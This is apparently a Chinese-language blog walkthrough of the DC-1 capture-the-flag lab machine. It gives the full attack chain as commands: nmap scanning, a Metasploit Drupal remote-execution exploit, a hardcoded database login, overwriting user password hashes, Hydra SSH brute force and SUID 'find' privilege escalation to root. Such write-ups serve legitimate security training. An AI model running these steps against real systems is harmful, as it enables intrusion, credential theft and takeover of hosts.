主机发现与端口扫描
打开DC-1,确认与主机在同一网段,查看mac地址
查看DC-1靶机ip地址
sudo arp-scan -l
扫描具体端口信息
sudo nmap -A -p- -sS -sC -T4 192.168.100.129
端口信息
| 22/tcp | open | ssh | OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) |
| 80/tcp | open | http | Apache httpd 2.2.22((Debian)) |
| 111/tcp | open | rpcbind | 2-4(RPC #100000) |
| 52523/tcp | open | status | 1(RPC #100024) |
可以发现靶机的22,80,111,52523端口已经开放
网站信息
访问dc-1网站
发现Drupal内容管理系统,用msf扫描
漏洞扫描与利用
进入msf
msfconsole
搜索durpal的漏洞
search drupal
攻击者可以使用该模块利用漏洞执行远程命令,进而控制受影响的Drupal网站
切换到该模块
use 1
查看具体漏洞
show options
使用set设置rhosts文件,指定靶机的ip地址
set rhosts 192.168.100.129
然后exploit进行攻击,攻击成功后会获得一个meterpreter的shell
(meterpreter是一种用于远程访问受攻击的主机系统的后门程序)
开始渗透
pwd 查看当前所在我路径,ls 查看所在路径的文件
flag1
发现里面有一个flag1.txt文件,cat查看
这边提示要去找CMS中的一个配置文件
shell:以靶机用户的身份运行靶机
开启使用python交互
python -c "import pty;pty.spawn( '/bin/bash')"
没有发现关键信息,继续找配置文件
find ./ -name "*settings*"
flag2
查看默认文件 ./sites/default/settings.php
看到了flag2文件,flag2中告诉我们无法暴力破解并且需要提权。
此外还发现一个名为drupaldb的数据库,然后我们登录一下这个数据库,查看其中的内容。
mysql -udbuser -pR0ck3t
查看当前数据库
show databases;
切换至drupaldb
use drupaldb
查看当前数据库的表
show tables;
发现里面有个users表,是存储网站注册用户的信息表
select*from users;
可以看到表中用户名的密码是加密的,数据库大部分加密方式是cmd5加密方式
$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
但密文太长难以使用在线解码器解码,准备修改admin密码
先找到加密文件,Drupal的加密脚本在
/var/www/scripts/password-hash.sh
目录下,我们先退出mysql
exit
打开加密脚本
cat /var/www/scripts/password-hash.sh
可以看出脚本是用php写的,而且还能用php加参数运行从而直接得到加密后的密码,这里我们设置一个密码123456
php /var/www/scripts/password-hash.sh 123456
得到加密后的密码, 接着我们登入mysql修改一下admin跟Fred的密码
mysql -udbuser -pR0ck3t
use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';
成功修改,查看一下
select * from users;
尝试登录网站
flag3
成功登录,寻找有用信息
提示一些passwd和shadow,即linux的文件
flag4
继续查看用户信息
tac /etc/passwd
成功找到flag4用户,回到主目录准备进行Hydra爆破
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.100.129
成功爆破出密码orange,然后用kali连接
ssh flag4@192.168.100.129
成功打开了flag4.txt
linux提权
使用find命令,查询具有SUID权限的可执行二进制文件
find / -perm -u=s -type f 2>/dev/null
常用find命令执行root权限的命令找查
find / -name index.php -exec "/bin/sh" \;
提权成功,只需要找到最终flag即可
flag5
cd /root
ls
cat *
成功拿到flag5!!!
标签:加密,查看,DC,靶机,详解,flag4,靶场,php,find From: https://blog.csdn.net/dengzikan120/article/details/144587853